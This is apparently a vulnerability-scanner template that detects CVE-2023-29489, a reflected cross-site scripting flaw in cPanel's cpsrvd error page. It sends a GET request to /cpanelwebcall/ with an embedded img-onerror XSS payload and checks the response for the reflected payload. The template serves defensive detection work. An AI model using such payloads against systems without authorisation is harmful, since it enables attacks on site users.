id: CVE-2023-29489

info:
  name: cPanel - Cross-Site Scripting
  author: derian
  severity: medium
  verified: true
  description: |
   介绍:在 11.109.9999.116 之前的 cPanel 中发现了一个问题。XSS 可以通过无效的网络调用 ID(也称为 SEC-669)出现在 cpsrvd 错误页面上。固定版本为 11.109.9999.116、11.108.0.13、11.106.0.18 和 11.102.0.31。
  reference:
  - https://blog.assetnote.io/2023/04/26/xss-million-websites-cpanel/

rules:
  r0:
    request:
      method: GET
      path: /cpanelwebcall/<img%20src=x%20onerror="prompt(1)">aaaaaaaaaaaa
    expression: response.status == 400 && response.body.bcontains(b'<img src=x onerror="prompt(1)">') && response.body.bcontains(b'Invalid webcall ID:')
expression: r0()
